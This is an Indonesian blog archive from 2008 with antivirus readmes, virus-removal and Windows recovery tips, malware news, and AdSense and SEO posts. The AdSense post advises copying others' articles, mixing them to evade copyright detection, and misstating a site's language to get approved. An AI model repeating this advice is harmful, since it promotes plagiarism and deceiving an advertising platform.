- TEKNOLOGI DETEKSI TERKINI: PCMAV menggunakan beragam teknologi
pendeteksian virus terkini, termasuk pattern matching, code
analysis dan hashing.

- GRATIS: Merupakan bonus ekstra di setiap pembelian Majalah PC
Media edisi terbaru yang terbit tiap bulan.

- MADE IN INDONESIA: PCMAV diciptakan dan dikembangkan sendiri oleh
bangsa Indonesia. Bangga dengan karya anak bangsa.

Download langsung Antivirus PC Media disini

Download:

PCMAV RC15 + RTP Beta5 (1.09 MB): DivShare, GudangUpload
PCMAV RC15 (0.64 MB): DivShare, GudangUpload
PCMAV RTP Beta5 (0.46 MB): DivShare, GudangUpload

atau
Download Antivirus PC Media disini

Ansav Antivirus lokal terbaik

2008-07-05T02:44:00.000-07:00

Antivirus lokal buatan salah seorang anak negeri ini terbilang cukup ampuh membasmi virus khususnya virus brontok beserta variannya.
Kelebihan antivirus Ansav adalah :
1. Kemampuan melakukan update virus definisi sendiri
2. Tool Tambahan digunakan untuk mendeteksi bila virus yang ada di komputer belum dikenali
3. Kecepatan Searching bagus
4. Tanpa instalasi

Download Ansav langsung disini atau
http://www.ansav.com/index.php/download/

Official Site Antivirus Ansav + ada di www.ansav.com

Informasi selengkapnya mengenai antivirus Ansav dibawah ini (diambil dari file readme.txt)

AN'S ANTIVIRUS (ANSAV) 32 BIT
-------------------------------
This stuff is freeware, free for use and free for distribute
For personal use only and not for commercial purpose
The software and any related documentation is provided "as
is" without warranty of any kind, this mean use at your own risk.

This stuff can download from :

- www.thekillermachine.isfun.net
- www.ansav.com

/**********************************************************************;

Dalam paket ini berisi :

- ANSAV32.EXE : File utama
- Readme.txt : File yang sedang Anda baca ini.
- extreme_n_nocaption.bat : ansav loader.
- extreme_scan.bat : ansav loader.
- nocaption.bat : ansav loader.
- reset_registry_settings.bat : file pembantu untuk menyetel ulang registry (reset)
- unRAR.dll : Rar library.

---------------------------------------------------------------------
Informasi Pembaharuan dan Versi ANSAV +E (An's AntiVirus +E)
---------------------------------------------------------------------

Engine Version : 3.3.3 BETA 7
Virus Definition Version : 7.4.19

---------------------------------------------------------------------
Engine Update
---------------------------------------------------------------------

# Versi 3.2.0

- Improvisasi di security dengan menambahkan module AntiKiller.
- Perbaikan bug minor.

# New Ansav +E version 3

- Telah mengalami beberapa pembaharuan pada engine dan penampilannya.
- Ditambah modul anpdetector.dll untuk mendeteksi packer dan kompiler
pada file eksekutabel.
- Auto detect dan permintaan konfirmasi untuk memeriksa setiap flashdisk
yang baru terpasang.

# New engine Ansav Guard (Real-time Protection) (beta)

- Ditambah kemampuan Real-time protection, yang berguna untuk mencegah
masuknya kembali virus kedalam komputer. Dengan hanya satu klik
dan tanpa memerlukan instalasi apapun, hanya cukup dengan mengkopi
filenya ke hardisk dan feature real-time protection sudah dapat
diaktifkan. :) have fun!

# New engine ANSAV +E

- Menggunakan 2 data base virus untuk mengidentifikasi virus
1 data base internal atau bawaannya, 2 data base virtual
atau data base bayangan.
- Memiliki kemampuan untuk mengupdate data base virusnya sendiri
tanpa membutuhkan koneksi internet.
- Ditambah fungsi anti virus detection, untuk menghindari blok
dari virus yang resident.
- Tambah fungsi command line "-resetreg" untuk menyetel ulang
setting terbatas pada registry menjadi default. lihat file :
"reset_registry_settings.bat"

untuk menjaga ukuran file ini terpaksa info lama dipotong.
tapi kamu bisa download dari situs www.ansav.com

Silakan download langsung antivirusnya melalui link berikut ini :

Download Ansav langsung disini atau
http://www.ansav.com/index.php/download/

1. Ansav Guard

Feature baru pada ANSAV +E BETA6 “ANSAV GUARD” menggunakan engine sendiri
untuk melindungi komputer dari terserang kembali oleh virus (khususnya lokal),
masih tetap portable untuk menggunakannya mudah dan tanpa memerlukan installasi.
masih dalam tahap beta sehingga kemungkinan masih terdapat banyak bug.

2. Database Virtual

Kemampuan untuk mengemulasi virus baru dan dapat mengupdate tubuhnya sendiri
setiap menemukan virus baru (suspected)

3. extreme_n_nocaption.bat

Scan komputer dengan sangat extreme with No Caption

4. extreme_scan.bat

Scan komputer dengan sangat extreme

5. nocaption.bat

Jika Terjadi Ansav32.exe di block oleh virus, Jalankan File ini

6. reset_registry_settings.bat

File pembantu untuk menyetel ulang registry (reset)

Anti virus buatan anak SMU

2008-07-05T02:42:00.000-07:00

========================
Smada Antivirus (SmadAV)
========================
----------------------------------
Versi : 3.4
Signature : 316 Virus
Tanggal Rilis : 18 Mei 2007
Web Site : www.smadav.co.nr
e-mail : smadav@gmail.com
Compiler : Visual Basic 6.0
Compressor : PEC 2.78a Student Build
---------------------------------- ========================
Daftar File SmadAV (zip)
========================
-----------------------------------------------------------------
File-file yang ada dalam File SmadAV (zip) :
- SmadAV 3.4.exe -> Program utama SmadAV
- Readme.txt -> Teks berisikan petunjuk pemakaian SmadAV
-----------------------------------------------------------------

=================
Mengapa SmadAV ?
=================
-----------------------------------------------------------------
- SmadAV adalah Antivirus lokal tak berbayar (freeware)
yang dikhususkan untuk mengatasi virus–virus lokal
ataupun mancanegara yang menyebarluas di Indonesia.

- Dengan menggunakan engine antivirus-nya sendiri, SmadAV
dapat melakukan scanning virus dengan cepat dan akurat.

- Dan ditambahkan dengan algoritma heuristic-nya, varian-
varian virus (baik varian terbaru ataupun varian lama)
yang belum ada di database SmadAV dapat dideteksi dengan
mudah.

- Apabila terdapat bug program, saran/kritik,pertanyaan, atau
ingin bekerja sama dalam pengembangan SmadAV silakan kirim
pesan ke email SmadAV (smadav@gmail.com).

- SmadAV hanya dapat berjalan dengan baik pada platform
Windows NT (Windows 2000, Windows XP), hal ini dikarenakan
virus-virus lokal saat ini lebih banyak menyerang komputer
dengan platform Windows NT. Dan komputer dengan Platform
Win 9X/ME masih aman dari serangan virus lokal.

- SmadAV bebas digunakan dan disebarluaskan dengan syarat:
- Tidak menambah atau mengurangi file-file yang ada dalam
Folder SmadAV (zip)
- Tidak memodifikasi SmadAV
- Tidak untuk kepentingan komersial atau profit

- Seperti program-program tak berbayar lainnya, SmadAV dibuat
dengan harapan dapat digunakan sepenuhnya oleh pengguna,
tetapi segala bentuk kerusakan yang mungkin berhubungan
dengan penggunaan SmadAV diluar tanggung jawab programmer.
-----------------------------------------------------------------

=======================
Perbaikan di SmadAV 3.3
=======================
-----------------------------------------------------------------
- Hand Cursor tidak digunakan lagi pada formnya karena pada
beberapa komputer dengan theme berbeda cursor tidak dapat
ditampilkan dengan baik.
- Upload virus bisa dilakukan di situs : viruses.4shared.com,
www.viruslokal.co.nr atau www.paray.co.nr
- Improvisasi fitur refresh pada tampilan form
- Signature menjadi 316 virus
-----------------------------------------------------------------

======================
Fitur-Fitur SmadAV 3.3
======================
-----------------------------------------------------------------
- Teknik "ExactPM", berfungsi untuk mengenali virus-virus
yang ada disignature SmadAV berdasarkan sebagian byte yang
ada pada file virus. Kelebihan teknik ini dibandingkan teknik
Hash (CRC32, MD5, dll) adalah :
- Tetap akurat dalam mengenali virus polymorphic
- Kecepatannya melebihi kecepatan antivirus lainnya
- Tidak banyak memakan resource memory

- Teknik "ResourceHeuristic", berfungsi untuk mendeteksi varian
baru dari virus, dengan teknik ini SmadAV dapat mendeteksi
varian-varian lain dari varian virus yang sudah ada di
signature SmadAV.

- Fitur “1 Virus By User”, berfungsi untuk menambahkan
1 virus ke database SmadAV, fitur ini akan sangat berguna
untuk membersihkan virus lokal terutama virus lokal baru
yang tidak dapat dideteksi oleh SmadAV. Dan dengan fitur
ini SmadAV bisa dikatakan sebagai antivirus lokal tanpa
harus diUpdate.

- Fitur "Suspected Path", anda bisa melihat path-path ini
pada tab "1 Virus By User", path-path ini adalah path-path
yang biasa ditempati oleh virus lokal dan jika komputer anda
sedang terinfeksi virus, kemungkinan besar path virus tersebut
akan ditampilkan pada daftar suspected path.

- Fitur “System Editor”, berfungsi untuk mengubah setting-
setting sistem di windows sesuai keinginan user. Setting-
setting yang ada dikhususkan pada setting yang biasanya
diubah oleh virus lokal (seperti : Disable folder options,
Disable regedit, dll).

- Fitur “File/Folder Hidden”, berfungsi untuk mengembalikan
attribute file/folder yang disembunyikan (di-hidden) virus
pada removable disk (Flash Disk, Floppy Disk).

- Fitur “Process Manager”, berfungsi untuk mengatur proses-
proses aplikasi yang sedang aktif di memory, dengan fitur ini
anda dapat mematikan proses virus yang sedang aktif di memory.
Kelebihannya dari "Windows Task Manager" yaitu
- Dapat mengatur (kill, suspend, resume, explore) banyak
proses sekaligus
- Fitur suspend dan resume yang belum ada di task manager
- Dapat menampilkan module-module yang sedang digunakan proses
- Ditampilkannya icon dari file proses

- Fitur "Upload Virus Sample!", dengan fitur ini anda
dapat mengirimkan file yang anda curigai sebagai virus kepada
programmer, setelah virus dianalisis selanjutnya akan dimasukkan
ke internal signature SmadAV, dan bisa anda download di versi
SmadAV yang berikutnya.

- Fitur "WinTools", jika anda kurang puas dengan berbagai
fitur yang ada di SmadAV, anda dapat menggunakan fitur-fitur
yang sudah ada di windows seperti: Regedit, Task Manager,
MSConfig, Command Prompt, dll.

- Database Internal SmadAV sebanyak 316 virus, Daftar virus-
virus yang sudah dikenali SmadAV dapat dilihat lebih lanjut
di Program SmadAV.

- Fitur "ScanningProgress", dengan fitur ini anda dapat mengetahui
persentase proses pen-scan-an. Ada 3 tampilan persentase, yaitu dengan
(1) progressbar, (2) Angka persentase pada textbox,
dan (3) Di Window title ketika form pada posisi minimize.

- Fitur "SelfCheck", berfungsi untuk mengecek keaslian file utama
SmadAV yang berjenis Executable File (exe), SmadAV tidak akan
dapat dibuka Jika file ini berubah dari struktur aslinya, baik karena
file rusak, telah diubah seseorang, ataupun karena telah diinfeksi virus.
Jika hal ini terjadi maka anda dapat mendownload ulang file asli
SmadAV di situsnya.
-----------------------------------------------------------------

=================
Pesan dari Author
=================
-----------------------------------------------------------------
Jika anda mempunyai satu atau banyak sampel virus terutama virus
lokal, saya sangat mengharapkan agar anda mengirimkannya dengan
format zip (dan dipassword : virus) ke www.viruslokal.co.nr atau
untuk lebih cepatnya anda bisa mengirimkan langsung
ke email SmadAV : smadav@gmail.com
-----------------------------------------------------------------

Recovery file system yang hilang/rusak

2008-07-04T15:41:00.000-07:00

Jika pernah mengalami file sistem windows (seperti *.dll dan *.sys) yang rusak (corrupt) atau hilang, sehingga windows tidak bisa booting ( hanya menampilkan pesan bahwa file xx.dll was mising or corrupt ), maka coba ikuti langkah berikut :

Restart komputer dari Windows Setup Floppy disk atau dengan Windows Installation CD-nya
Ketika tampil “Welcome to Setup” Screen tekan F10 atau tekan R ( Pengguna Windows 2000 harus menekan F10 atau R kemudian C).
Ketika ditampilkan daftar installasi dan text “Which Windows Installation would you like to log on to?”, pilih nomor yang cocok sesuai dengan Instalasi Windows yang ingin di repair
Tulis Password Administrator dan tekan Enter. Jika tidak ada passwordnya, langsung tekan enter
Dari tampilan yang muncul, ketik perintah seperti berikut :
expand D:\i386\xx.dll C:\dir_target
Dimana xx.dll merupakan nama file yang rusak/hilang yang ingin di recovery, D: merupakan Drive letter untuk CD-ROM dan dir_target merupakan direktory target, kemudian tekan enter.
Sesudah itu ketik exit, untuk keluar kemudian keluarkan CD-nya dan Restart komputer

Menghapus Virus Lokal Secara Manual

2008-07-04T15:20:00.000-07:00

Menghadapi serangan berbagai macam virus komputer – dengan OS Microsoft Windows tentu saja – kebanyakan orang akan memikirkan bagaimana mendapatkan antivirus terbaru dan antivirus khusus untuk virus lokal tertentu karena kebanyakan software antivirus tidak mampu mendeteksinya. Berbeda dengan cara pikir yang sangat umum ini, saya menawarkan solusi alternatif menghadapi virus lokal yaitu membasminya secara manual.

Virus adalah program/aplikasi (=serangkaian perintah) yang mampu memperbanyak diri. Kebanyakan programer membuat virus-virus ini sebagai serangkaian perintah yang menyusup ke dalam barisan perintah-perintah dalam aplikasi-aplikasi lain. Virus-virus tertentu bahkan diprogram mampu menyelinap dalam master boot record ataupun sektor-sektor tertentu dalam disk dengan perlindungan khusus tanpa bisa dikenali pengguna sebagai file. Sayangnya pekerjaan cerdik ini tidak berlaku untuk kebanyakan virus lokal yang keberadaannya sangat mencolok dan mengundang permusuhan.

Berdasarkan titik lemah inilah kita dapat membasmi virus lokal secara manual. Ada dua acuan umum dalam membasmi virus secara manual yaitu menghentikan running virus dan melenyapkan virus-virus. Berdasarkan dua acuan ini anda dapat mengembangkan sendiri strategi anda tergantung kasus yang anda hadapi.

Bagian I: Menghentikan Running Virus

Untuk serangan virus yang dibuat dengan Visual Basic (VB) – untungnya kebanyakan virus lokal dibuat dengan VB – anda dapat menghentikan running virus dengan cara ‘menyingkirkan’ msvbvm50.dll dan msvbvm60.dll yang berada dalam direktori c:windowssystem32 yang merupakan virtual machine dari program-program yang dibuat dengan VB. Adapun istilah ‘menyingkirkan’ bisa diwujudkan dengan berbagai cara tergantung keadaan ataupun selera, yaitu dihapus (tidak dianjurkan), dipindah ke folder lain, atau diganti dengan nama lain. Selain itu caranya bisa dilakukan dengan berbagai cara tergantung dari tingkat serangan virus mulai dari menggunakan windows explorer, command prompt emulator pada windows (ketika virus menonaktifkan windows explorer), ataupun harus menjalankan windows dalam mode ‘save mode with command prompt only’ dengan menekan F8 pada awal windows startup untuk menampilkan startup menu. Jika virus masih tetap berjalan, berarti virus tidak dibuat dengan VB dan untuk menjalankan langkah selanjutnya anda harus menggunakan Linux atau OS lain yang tidak terpasang emulator untuk program-program windows.

Bagian II: Menghapus Virus-virus

Untuk melenyapkan virus-virus yang harus anda lakukan adalah mengumpulkan semua file aplikasi melalui find dengan entri nama *.exe, mengidentifikasi aplikasi-aplikasi yang merupakan virus, dan menghapus mereka. Jika menu find telah dinonaktifkan oleh virus, anda bisa memanggilnuya dengan menekan F3 (jauh lebih mudah daripada harus mengedit registry editor). Memvonis aplikasi sebagai virus sangat tergantung dari pengalaman dan insting anda, karena ciri-cirinya bisa sangat bervariasi; tetapi yang harus menjadi acuan adalah bahwa anda mencari hal-hal ‘tidak seperti yang semestinya dan berada di tempat semestinya’ atau terkesan disembunyikan. Aplikasi-aplikasi dengan icon Microsoft word Document atau icon folder bisa langsung divonis sebagai virus, tetapi aplikasi dengan ikon biasa pun harus anda curigai jika anda yakin siapapun tidak pernah memindahkannya ke sana. Untuk memperkecil ruang lingkup, anda juga perlu memperhatikan ukuran file karena banyak virus yang masing-masing mempunyai ukuran file sama.

Aplikasi yang telah anda vonis sebagai virus harus dihapus langsung dengan menekan sift+delete. Sebelumnya, pastikan semua data telah anda selamatkan dengan mengkopi isi dokumen dan di-paste di tempat lain dalam keadaan virus tidak runnig. Selamat beraksi.

Rontokbro menyerbu Indonesia

2008-07-03T08:31:00.000-07:00

Siapa bilang putra Indonesia tidak mampu bersaing dan berkiprah di dunia ? Lihat Teh Botol Sosro, Gudang Garam, Indomie dan Pacekap yang dimiliki oleh putra Indonesia yang menguasai pasar Indonesia dan mulai merambah pasar dunia. Kalau selama ini virus lokal seperti Kangen, Tabaru (Riyani Jangkaru), Lavist atau Kumis yang asli buatan Indonesia dapat digolongkan sebagai virus "kelas 2" karena penyebarannya mengandalkan UFD (USB Flash Disk) meminjam istilah yang digunakan Tabloid PC Plus :) dan mayoritas menyebar di Indonesia atau Asia Tenggara. Maka kini para pengguna internet Indonesia dan di belahan dunia lain seperti Amerika, Polandia, Spanyol, Jepang, Vietnam, Belanda, Hungaria, Swedia, Peru, Rusia dan Israel juga kebagian aksi virus baru yang diberi nama W32/Rontokbro@mm, sesuai dengan namanya maka anda tahu bahwa virus ini mampu menyebarkan dirinya dengan mass mailing (email massal) dan memupuskan "tradisi" virus lokal yang mengandalkan UFD sebagai sarana penyebaran utamanya. Banyak hal yang mengejutkan dari Rontokbro ini seperti kemampuan rekayasa sosial yang tinggi dan dapat dikatakan berciri asli Indonesia dan pertama kali digunakan oleh virus lokal seperti memalsukan "icon" dirinya sebagai file tidak berdosa baik sebagai file MS Office ataupun sebagai folder, melakukan bloking akses Registry Editor, melakukan restart komputer jika menemukan kata tertentu pada header browser, selektif dalam mengirim email bervirus (guna menghindari deteksi cepat oleh vendor sekuriti) sampai "mengerjai" Host file komputer lokal sehingga akses ke situs sekutiri tertentu menjadi terblokir.

Mengapa Rontokbro

Tentunya anda bertanya, kok namanya susah amat Rontokbro ? Apa maksudnya mengakibatkan komputernya si Bro Rontok ? :). Atau apa alasan lain ? Menurut pengamatan teknisi laboratorium virus Vaksincom, ternyata pembuat virus ini mendapatkan ilham membuat virus ini dari satwa langka Indonesia, Elang Brontok yang memiliki nama latin Spizaetus cirrhatus, selain itu rupanya pembuat virus Rontokbro (yang disinyalir berasal dari salah satu universitas pemerintah di Jawa Barat) juga menyebarkan pesan anti korupsi, anti freesex dan anti pencemaran lingkungan dalam email yang dikirimkannya dengan lampiran kangen.exe. Apakah pembuat virus ini sama dengan pembuat Kangen, atau ia hanya membonceng kepopuleran virus Kangen agar dirinya dapat menyebar dengan baik, yang jelas menurut statistik Vaksincom penyebaran Rontokbro saat ini sudah mengalahkan Kangen. Gara-gara Rontokbro ini juga Vaksincom jadi mau tidak mau mencari sedikit informasi tentang Elang Brontok yang ternyata merupakan satwa burung khas Indonesia yang patut dibanggakan karena memiliki keunikan morphologi yang tidak dimiliki burung lainnya di dunia. Terimakasih kepada bung Thomas Feri atas sharing informasinya dan kesediaannya mengizinkan Vaksincom menampilkan gambar Elang Brontok Spizaetus cirrhatus limnaetus dibawah ini.

Tips n trik supaya bisa di terima di google adsense

2008-07-02T15:17:00.000-07:00

Apakah anda selama ini selalu gagal mendaftar di Adsense ? lalu, apa permasalahan anda sehingga selalu di tolak oleh Adsense sebagai publisher ? Mungkin saya bisa memberikan solusinya.

Tips artikel ini saya tulis berdasarkan pengalaman saya yang 99% diterima oleh Google Adsense sebagai publisher (tentunya saya bikin dengan account yang berbeda-beda).

Bagi yang belum tahu apa itu Adsense, saya jelaskan secara singkat:

Google Adsense adalah salah satu cara / solusi mencari duit / uang di internet, jadi , kita dibayar karena website kita menampilkan iklan yang berupa potongan script yang ditempelkan di situs kita.
Tentang cara / mekanisme iklan itu bekerja, untuk sementara anda tidak perlu tahu, yang penting saya memberikan solusi / tips supaya anda bisa diterima secara cepat / kilat hanya dalam 1-3 hari, malahan mungkin dalam hitungan kurang dari 24 jam (…itu berdasarkan pengalaman saya lhoo..)

Mungkin agak tricky apa yang saya tulis di artikel ini , tetapi it’s ok lah .. selama kita bisa mencari devisa buat negara kita.

Langkah-langkah yang mesti anda perhatikan adalah:

[a] Apakah anda sudah pernah ditolak setelah mendaftar sebelumnya ke Google Adsense ?
Jika pernah, apa yang menjadi masalah / alasan mereka ketika situs anda di tolak ?
Apakah situs anda berbahasa Indonesia ?
Jika ya, bukan masalah, anda bisa mendaftar lagi….

Jika tidak, lalu apakah situs anda berisi content pornografi ?
Jika ya, lalu apakah situs anda berada di blogspot / blogger ?
Jika situs anda ditolak karena berisi content pornografi yang berada di blogspot / blogger, LUPAKAN UNTUK MENDAFTAR KEMBALI DENGAN ALAMAT YANG SAMA. Gunakan alamat lain untuk mendaftar kembali.

[b] Anggap saja anda tidak pernah mengenal apa itu Adsense, dan tidak pernah mendaftar sebelumnya. Saya akan berikan tips kilat kepada anda. Langkah-langkah yang perlu ambil supaya mudah di approve Google Adsense sebagai publisher adalah :

1. Bikin account di Blogger, caranya, kunjungi :

http://www2.blogger.com/

2. pilih “CREATE YOUR BLOG NOW”

3. Isi form data2 anda dari email address, Password, Display Name, Word Verification, dan centang Acceptance of Terms sebagai persetujuan anda mengikuti aturan mereka.

4. Beri judul Blog anda, dan berikan nama URL alamat blogspot anda.

5. Pilih template yang cucok dengan selera anda.

6. Setelah itu “START POSTING” artikel baru ?

Tunggu dulu….

7. Jika anda yang tidak fasih dalam bahasa inggris atau mengalami kesulitan mencari ide, lebih baik anda COMOT dari Internet Artikel-artikel yang berbahasa Inggris.

Saya pakai istilah PINJEM, bukan NYOLONG artikel, karena begitu SITUS BLOGGER kita diapprove google adsense, anda bisa hapus dan ganti dengan artikel berbahasa Indonesia.

8. Setelah “MEMINJAM” artikel orang lain di internet, baru START POSTING..

9. Muntahkan semua artikel yang baru anda “PINJEM” dari orang lain yang berbahasa Inggris ke artikel pertama anda.
Ingat : USAHAKAN NYARI ARTIKEL YANG PANJANG (walaupun anda tidak tahu apa isinya)

Saran saya : comot dari wikipedia atau answer.com, atau lebih baik, di campur aduk (jaga2 siapa tahu sekarang Google mempunyai teknik baru dalam melacak copyright artikel lain di internet).

10. Setelah postingan artikel pertama anda berhasil, mulailah sign up / register / daftar dari URL ini

Daftarlah dari gambar berlogo Google Adsense (klik dari gambar),
kemudian pilih BUTTON: SIGN UP NOW seperti gambar dibawah:

dan lengkapi data diri anda di formulir isian yang nantinya disodorin mereka. Hati-hati dalam pengisian, biasanya kita terjebak saat mengisi WEBSITE LANGUAGE kita, lebih baik kita memilih ENGLISH, karena kalau anda mengisi website anda berbahasa Indonesia, anda akan di tolak mereka.

11. Jangan lupa juga isi nomor telepon anda di mulai dengan prefix 62, misalnya nomor telpon anda 02167424433, maka isilah nomor telp dengan 622167424433

12. Anda akan dikirimkan email notifikasi bahwa anda adalah pemilik sah EMAIL yang anda daftarkan, kemudian anda disuruh mengclick URL yang dikirimkan mereka.Setelah itu ….

13. Centang semua jika muncul :

AdSense applicants must agree to adhere to AdSense program policies (details)
I agree that I will not click on the Google ads I’m serving through AdSense.
I will not place ads on sites that include incentives to click on ads.
I agree that I can receive checks made out to the payee name I have listed above.
I will not place ads on sites that include pornographic content.
I certify that I have read the AdSense Program Policies.

14. Centang pilihan pertama jika muncul :

Would you like to have a single account for all Google services?
You can use your existing Google account email address and password for AdSense as well. Or you can choose new ones just for AdSense.

I’d like to use my existing Google account for AdSense.

I’d like to choose a new login name and password just for AdSense.

Setelah itu akan muncul KOTAK isian LOGIN, lalu loginlah dengan username dan password yang sama dengan username / password yang anda daftar di WWW2.BLOGGER.COM itu.

13. Tunggu email dari mereka beberapa hari kemudian, yang berisi “CONGLATURATIONS !!”

cari duit lewat internet

2008-07-02T04:42:00.000-07:00

Silakan mendaftar untuk menjadi mitra google adsense, jika anda sudah mendaftar maka otomatis anda akan diberi komisi untuk produk yang di jual, dan anda sebagai perantaranya. dengan kata lain anda sebagai brokernya gitu... ini adalah link utuk bisa mendaftar di google adsense...

selamat menikmati..

Langkah pertama kunjungi : https://www.google.com/adsense/
Langkah kedua kunjungi : http://internetmarketing-tools.info/LearningInternet/Create%20Adsense/

Cara - Tips agar website berada di peringkat atas Google Search Engine

2008-07-02T03:37:00.000-07:00

Dari : [rahasia]

Kepada Saudara,
saya mohon bantuan ke anda untuk membantu saya mendaftarkan web saya ke
google agar bisa tampil di search engine secara gratis dan bahkan ada di
urutan halaman awal dan mohon dibantu caranya dapat penghasilan lewat
internet dengan cara jujur.
tolong dibalas ke email saya,
terimakasih banyak, sukses selalu untuk anda.

Sebenarnya saya memang berniat menulis artikel tentang Search Engine Optimation ( SEO ) di blog ini, tetapi saya sering lupa karena waktu yang sangat sibuk. Tetapi berhubung banyak sekali permintaan baik tulisan maupun lisan, saya akan berbagi ilmu walaupun saya baru serius menggeluti dunia SEO beberapa bulan lalu, dan banyak eksperimen saya yang berhasil.

Dewasa ini memang sangat susah untuk membangun sebuah “kerajaan” website di internet,
ada istilah siapa yang duluan, dia yang menang., maksudnya, siapa yang duluan mengenal dunia internet dia yang akan menguasai pasaran internet.

Memang ada betulnya istilah itu, tetapi tidak mutlak seperti itu walaupun memang banyak terbukti. Tetapi mitos itu pernah saya patahkan, terbukti saya pernah membangun sebuah situs, dan dalam 2 bulan, situs saya langsung menduduki Google Page Rank 4 dan Alexa Ranking 200.000-an. Artikel ini pernah saya tulis sebelumnya.

Waktu itu, saya membangun situs blogspot, dan kata2 kunci saya selalu berada di urutan 10 besar dan rata2 visitor masuk ke blogspot saya melalui search engine google 600-700an org per hari, tetapi saya sudah menghapus situs itu karena situs itu adalah situs porno. Tetapi masalah posisi top search engine bukan masalah situs porno atau bukan, yang terpenting adalah penamaan kata kunci / keywords.

Ini gambar traffic yang saya punya, pernah mencapai 1700-an visitor, pada tanggal 18 Januari 2007, padahal pada 2 minggu sebelumnya, saya pernah menghapus blog itu, kemudian membangunnya kembali pada 3 hari setelah itu.

mending ke URL nya langsung untuk membuktikannya

http://xxx.cqcounter.com/?sts,summary,,,,ivbsav

Pada saat pertama kali membuat blog itu tanggal 8 November 2006, lalu saya pasang counter langsung, karena saya sudah promosikan blogsite saya di forum2 porno dan saya ingin memonitoring blogspot saya.

Mungkin bagi yang tidak percaya, silahkan ke URL ini biar lebih jelas:

http://xxx.cqcounter.com/?sts,summary,,,,ivbsav

Ok, daripada membuang waktu, kita mulai saja.

Pertama-tama yang harus diperhatikan sebelum membeli sebuah domain, carilah nama yang tepat sebelum membeli, karena nama domain juga menjadi pertimbangan search engine dalam pencarian.

Kedua, berikanlah nama halaman yang tepat pada halaman situs yang anda harapkan tampil di urutan teratas melulu di search engine.
Misalnya : http://www.speedytown.com/cari+uang+gampang+dan+cepat+kaya+mendadak.html

Ketiga : Berpikirlah seolah-olah anda seorang visitor yang sedang mencari di search engine, gunakan kata “saya” dan bukan “anda” dalam isi artikel / tulisan anda.

Keempat : Bikinlah title / judul halaman yang kira-kira menjadi kata kunci / keywords orang-orang yang mencari di search engine. Ini elemen yang sangat penting.

Kelima : Isi website anda usahakan mempunyai isi yang sangat panjang, dalam hal ini isi tulisan artikel anda.

Keenam : Jika terdapat image di halaman anda, berikan nama file yang tepat ke file image dan simpanlah di server website anda. Sering kali hal ini diremehkan, padahal banyak sekali orang yang mencari gambar di search engine dan siapa tahu gambar anda muncul dan orang akan masuk ke website anda melalui gambar tersebut.

Ketujuh : Bikin halaman yang banyak diserver anda dengan rich content juga (maksudnya isi artikel yang panjang), dan berikan hyperlink satu sama yang lain biar bisa saling mendukung dan pada akhirnya Google Page Rank anda akan terangkat / terdongkrak.

Kedelapan : Bikin artikel yang kira-kira menjadi favorit bagi banyak orang.

Kesembilan : Jika anda tidak mempunyai space banyak diserver sehingga halaman2 di website anda sedikit, jangan takut, ajak tukaran link atau lebih ekstrim, belilah LINK (pasang iklan) ke situs2 yang mempunyai Google Page Rank yang lebih tinggi, atau setidaknya pasang iklan disitus yang pengunjungnya ramai karena GoogleBot akan rajin mengupdate halaman2 web anda.

Kesepuluh : Submit website anda ke search engine2 sebanyak mungkin misalnya : Yahoo, Google, AltaVista (walaupun tidak terlalu perlu), HotBot, GigaBlast, Windows Live, MSN dan lain-lain.

Kesebelas : usahakan perbanyak / update terus artikel / halaman2 di webpage anda, jangan diperpendek, lebih baik diperpanjang / diperkaya / diperbanyak.

KeduaBelas : Usahakan isi artikel anda berbelit-belit misalnya menggunakan kata “alias” atau kata “atau”. contoh isi : CARA CARI UANG MUDAH / GAMPANG / SANTAI DALAM SEKEJAP ALIAS CARI DUIT TANPA USAHA , bla..bla..bla.

Ketigabelas : Ulangi kalimat yang dianggap penting beberapa kali, dan inipun sangat berpengaruh posisi anda di search engine.

Keempatbelas : Promosikan link anda di situs-situs berisi forum diskusi, taruh di signature atau di shoutbox (mereka click atau tidak click, no problem).

Kelimabelas : Sukses buat anda jika anda mengikuti langkah-langkah diatas, saya jamin posisi search engine anda akan selalu diatas.

Kunci sukses : Jangan takut dengan webpage-webpage yang sudah mapan, dengan Google Page Rank yang masih nol saja kita bisa mengalahkan para “Goliat”.

Virus Lokal melemah Virus Impor Mengganas

2008-07-02T02:28:00.000-07:00

Saat ini perkembangan malware ternyata berubah-ubah dengan cepat. Lihat saja, di Indonesia sendiri serangan virus-virus lokal semakin menurun, mungkin karena para vxer domestik sudah mulai jenuh dan kehabisan trik untuk mengembangkan kemampuan malcodingnya. humm... ada apa gerangan dengan para vxer?

Keadaan ini ternyata berbanding terbalik dengan virus-virus import, dimana frekuensi serangannya semakin lama semakin meningkat dari waktu-kewaktu. Bahkan seakan menjadi trend bisnis kotor saat ini, malcoding memiliki peluang bisnis yang lebih besar dan lebih menggiurkan dibandingkan dengan kerjaan rutinitas para programmer professional dikantornya, demikian seperti yang dikutip detikinet.com. Sehingga saat ini banyak para programmer professional yang mulai berlaih ke aktifitas malcoding, dimana malcoding sudah bukan hanya sekedar simbol untuk mengatakan "inilah kemampuanku dalam membuat virus" tetapi telah berubah menjadi "inilah cara termudah ku dalam mencari uang". Malcoding bukanlah menjadi mainan para vxer amatir lagi saat ini, tetapi diperkirakan sudah banyak programmer dengan pendanaan yang kuat dan SDM yang mumpuni mulai mempraktekan malcoding.

Perushaan-perusahaan besar sudah mulai menggunakan cara kotor ini untuk melumpuhkan rival bisnisnya. Dan bahkan mereka rela menyewa vxer, hacker dan cracker untuk melumpuhkan lawan bisnisnya.

Kita yang berada di Indonesia masih bisa bernafas lega, karena semua itu baru terjadi di luar sana, semoga perkembangan malware di indonesia akan terus turun seperti yang sedang terjadi saat ini. let's down.. :)

Daftar Virus Lokal dengan Serangannya yang Paling Ganas

2008-07-02T02:26:00.000-07:00

Virus-virus lokal banyak bermunculan, dan dibuat dengan bahasa pemrograman Visual Basic.

Spesialis antivirus dari perusahaan PT Vaksincom Alfons Tanujaya menilai, para pembuat virus cukup kreatif dengan membuat terobosan-terobosan yang mampu menutupi kelemahan virus yang dibuat dengan Visual Basic.

Berdasarkan data dari PT Vaksincom, berikut adalah daftar virus lokal dengan aksi paling ganas pada kuartal pertama tahun 2007:

- Babon, 49 KB, mengubah properties dan AM/PM pada jam menjadi tulisan Babon.

- Aksika (4k51k4), 45 KB, membuat backup MSVBVM60.DLL. disable System Restore, aktif di normal mode, Safemode dan Safemode with Command Prompt.

- Coolface, 78 KB, virus Bangka yang ditulis dalam bahasa C++ dan berusaha membasmi semua virus Visual Basic dengan menghapus file MSVBVM60.DLL.

- KillAV, 22 KB, menyembunyikan semua file MS word dan mengganti dengan dirinya.

